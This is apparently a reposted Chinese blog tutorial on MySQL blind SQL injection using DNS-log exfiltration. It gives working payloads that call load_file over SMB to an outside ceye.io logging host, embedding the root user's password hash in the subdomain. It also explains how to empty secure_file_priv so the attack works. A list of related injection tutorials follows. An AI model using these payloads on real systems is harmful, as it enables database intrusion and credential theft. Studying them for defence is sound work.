利用DNS日志进行MySQL盲注

最新推荐文章于 2024-09-14 19:55:29 发布
最新推荐文章于 2024-09-14 19:55:29 发布
阅读量64 收藏
点赞数
文章标签: 数据库 运维
原文链接:http://www.cnblogs.com/KevinGeorge/p/10998700.html
版权

0x01 技术原理

这里是利用load_file这个函数利用smb请求方式请求域名机器下的一个文件,由于计算机对该域名不熟悉所以需要优先请求DNS,所以我们通过DNS日志记录中的内容来获取回显。解决了盲注回显的问题,或者是时间注入判断的问题。
熟悉MySQL的人都知道,这个利用有几个要求或者说是限制条件

# 条件1
+  1、由于基于SMB请求,需要在Windows环境下
# 条件2
+  2、需要MySQL的配置支持,主要是这个配置需要为空
secure_file_priv

0x02 测试

0x02 - 01 简单的load权限查看

show global variables like '%secure%';

1070321-20190610163353429-840816511.png
这里满足要求,如果不满足,可以在my.ini或者my.cnf等mysql服务的配置文件中修改[mysqld]项,需要加上如下这行:

secure_file_priv =

0x02 - 02 load一个域名下的文件试试看

select load_file('\\\\root.xxxxxx.ceye.io\\abc');

1070321-20190610163709591-1217304260.png

0x03 - 03 使用拼接函数,对我们想要获取的数据进行拼接

select concat("\\\\",SUBSTR((select password from mysql.user where user='root' limit 1),2),'.xxxxxx.ceye.io\\1234')

1070321-20190610164948392-468934884.png

0x02 - 04

select load_file(concat("\\\\",SUBSTR((select password from mysql.user where user='root' limit 1),2),'.xxxxxx.ceye.io\\1234'));

1070321-20190610165305042-2047105114.png

转载于:https://www.cnblogs.com/KevinGeorge/p/10998700.html

weixin_30793643
关注
dnslog盲注原理
rane的博客
03-18 1838
Dnslog盲注原理 布尔盲注时间盲注相当于猜单词的游戏,我们需要对每一位逐步的猜测,效率很低,需要发送很多的请求进行判断,很可能会触发安全设备的防护 我们需要一种方式能够减少请求,直接回显数据——Dnslog注入 Dns在解析的时候会留下日志,通过读取多级域名的解析日志,获取请求信息 Dnslog盲注方法 登录http://ceye.io/网站并注册,得到属于自己的identifier 先尝试...
Dnslog在SQL注入中的实战
Hq_Dream的博客
01-20 3050
Dnslog在SQL注入中的实战 本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于Dnslog在SQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了这个攻击方式,或者只是用某个简单的payload做了简单的验证。 本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于Dnslog在SQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了...
SQL盲注——时间盲注dnslog盲注
mikeyning的博客
10-27 251
SQL盲注——时间盲注dnslog盲注 时间盲注 时间盲注原理 $id=$_GET['id']; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo 'You are in...........'; } else { echo 'You are in...........';
辅助DNS设置、dhcp分配的ip地址同步到dns的A记录里和mysql的一些基本操作
开心鬼的博客
12-01 719
####辅助dns服务器####安装dns服务并且配置好辅助dns上:vim /etc/named.rfc1912.zones####以westos域为例子##辅助dns的配置zone "westos.com" IN {        type slave;        masters { 172.25.254.11; };        ##主dns的ip地址        file "sla...
SQL注入利用DNSlog外带盲注回显
baynk的博客
03-31 6058
0x00 SQL盲注 当我们发现一个站点存在一个没有数据回显的注入进行注入时,只能采取盲注,这种注入速度非常慢,需要一个一个字符猜解,而且很容易被网站BAN掉IP,虽然也可以使用代理IP池,但是还是需要一种快速有效的方法来获取数据。 此时我们就可以利用DNSlog来快速的获取数据,当然我们也可以在无回显的命令执行或者无回显的SSRF中利用。 0x01 DNSlog利用条件 DBMS中需要有可...
mysql 盲注手动_学习笔记 MYSQL盲注
weixin_36248747的博客
02-02 225
猜解当前数据库名输入 1 ’ and length(database())=1 # ,显示不存在;输入 1 ’ and length(database())=2 # ,显示不存在;输入 1 ’ and length(database())=3 # ,显示不存在;输入 1 ’ and length(database())=4 # ,显示存在:采用二分法猜解数据库名输入 1’ and asci...
mysql盲注类型_盲注
weixin_29346059的博客
02-28 475
目录0X01 HTTP POST介绍0X02 POST基于时间盲注0X03 POST基于布尔的盲注0X04 Sqlmap安全测试0X01 HTTP POST介绍POST 发送数据给服务器处理,数据包含在HTTP信息正文中 POST请求会向指定资源提交数据,请求服务器进行处理,如:表单数据提交、文件上传等,请求数据会被包含在请目录Sql注入什么是Sql注入呢?Sql注入有哪些例子?检索隐藏数据打破...
dnslogmysql在linux_DNSlog平台各种利用姿势(盲注
weixin_30588427的博客
02-23 638
题记首先祝大家新年快乐,过年给我最大的感觉就是几家欢喜几家愁,我们国家总量看似光鲜,可是平均下来也不多,小老百姓更不容易了,一般没有文化的百姓除了创业就是打工就是中间商赚差价,真是生活不易,加油,一起建设新中国。DNSlog我以前是通过看推文了解过,后来零组上架了这么个功能,想着试试,后来发现零组的好像还用不了,还是用别的平台吧,这是可以利用进行快速盲注的工具,看完大佬们的文章复现完受益良多,g...
mysql dnslog_渗透技巧:使用dnslog加快盲注速度 · C1imber’s Blog
weixin_34624426的博客
02-07 625
sql盲注分为基于bool的盲注和基于时间盲注,大家都知道,盲注是在页面没有显示位并且没有报错信息的时候,通过构造payload使页面返回的内容不同或者是页面响应的时间不同从而去判断出数据库中的数据,不管是bool盲注还是时间盲注,在进行判断的时候都需要一个字符一个字符的去判断,虽然二分法可以加快盲注的速度,但是还有一种更好的办法,那就是使用dnslog,具体过程如下图由上图可以看出要进行dns...
MySQL 面试题-SQL注入篇.docx
09-17
SQL注入是一种严重的网络安全威胁,尤其针对使用MySQL数据库系统的Web应用程序。攻击者通过在用户输入的数据中插入恶意SQL代码,可以操控数据库,获取敏感信息,甚至破坏整个系统。以下是关于SQL注入的详细解释和...
MySQL-DNS注入
weixin_45634365的博客
03-03 282
一、DNS注入的原理 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录,将盲注变为显错注入 即读取远程共享文件,拼接出函数,进行查询,再拼接到域名中,访问时将访问服务器,记录后查看日志 对于sql盲注,常见的方法是使用二分法一个个猜,但是这样的方法很麻烦,还很容易因为数据请求频繁导致被禁 所以可以将查询到的数据发送给一个URL,利用DNS解析产生的记录日志
封神台MYSQL 注入 - Dns注入
qq_40941912的博客
10-05 1163
一、原理 DNSLOG的使用场景: 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 LOAD_FILE()读取文件的函数 读取文件并返回文件内容为字符串。要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。
【CTF_流量日志分析】sleep函数的二分法的盲注日志分析
serendipity1130的博客
10-16 2257
1.分析日志找到进行盲注判断的位置进行分析: 分析过程 : 拿一条举例,该语句表述当判断当第22位的ascii码大于100时,将延迟1秒,所以将继续进行二分法的拆分,根据大于102和101时没有延时说明小于101,此时判断是否等于101,因此101的ascii对应的应该是盲注判断出来的字符串。 2.根据以上分析,可以手动提取不等于的ascii码进行字符串转换也可以写脚本: import urllib.parse import requests,re f = open('紧急网络安全事件.lo
4.网络编程
最新发布
weixin_45476535的博客
09-14 341
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
Oracle EBS中AR模块的财务流程概览
qq_36620997的博客
09-14 599
AR模块的财务流程概览
Oracle 12c 及以上版本补丁更新说明及下载方法
zd1320732的专栏
09-10 352
参考下面的文章,会对补丁更新的流程有一定的了解。
linux环境下手动安装mysql
weixin_45583482的博客
09-14 663
没想到兜兜转转这么些年,今天申请个云服务器用来搭建求生2服务器,先用mysql来测试,结果还是花了相当久的时间。基本所有单节点部署应用到linux环境,都三个流程:1 下载安装包2 解压修改配置文件3 运行启动脚本我们按这个流程来说我遇到并解决的问题 ,如果你在过程中遇到什么问题,也请先暂停你的启动流程,移步到最下面的内容,看看是否有和你遇到一样的问题,解决以后继续。
转行软件测试工程师经验总结
2402_84109700的博客
09-12 530
数据安全官,CCRC-DSA数据安全评估师,CCRC-DCO数据合规官,CDO首席数据官, ITSS IT服务项目经理,IT服务项目工程师,ISO27001,CISP,软考,CISAW应急服务方向,CISAW渗透测试方向,软考,CCSC网络安全能力,工信部教考中心计算机网络安全相关认证办理。在测试理论方面,要熟悉常用的测试用例设计方法,理解不同测试类型的特点,掌握测试用例的基本格式,以及测试结束的标准。最终,我如愿以偿地加入了一家互联网公司,这里的办公环境优越,薪资也较之前的工作有所提升,使我心情愉悦。
利用随机错误进行DNS劫持的新方法
本文档标题为《DNS劫持而不探索:无利用的比特 squatting DNS 攻击》(DNS Hijacking without Exploration: Bit Squatting without Exploitation),作者是 Artem Dinaburg,发表于2011年,由 Raytheon Company 出品...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值